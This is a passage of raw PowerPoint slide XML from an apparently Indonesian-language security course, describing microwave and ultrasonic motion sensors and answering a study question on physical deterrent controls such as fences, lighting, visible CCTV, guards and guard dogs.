              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ritel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pejalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kaki.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memancarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pantulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikombinasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ganda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parkir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ultrasonik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memancarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendengaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasuki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302754407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1. What physical site security controls act as deterrents?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>deterrents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> CCTV yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>rambu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (security guards), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>anjing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Deterrent controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>niat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
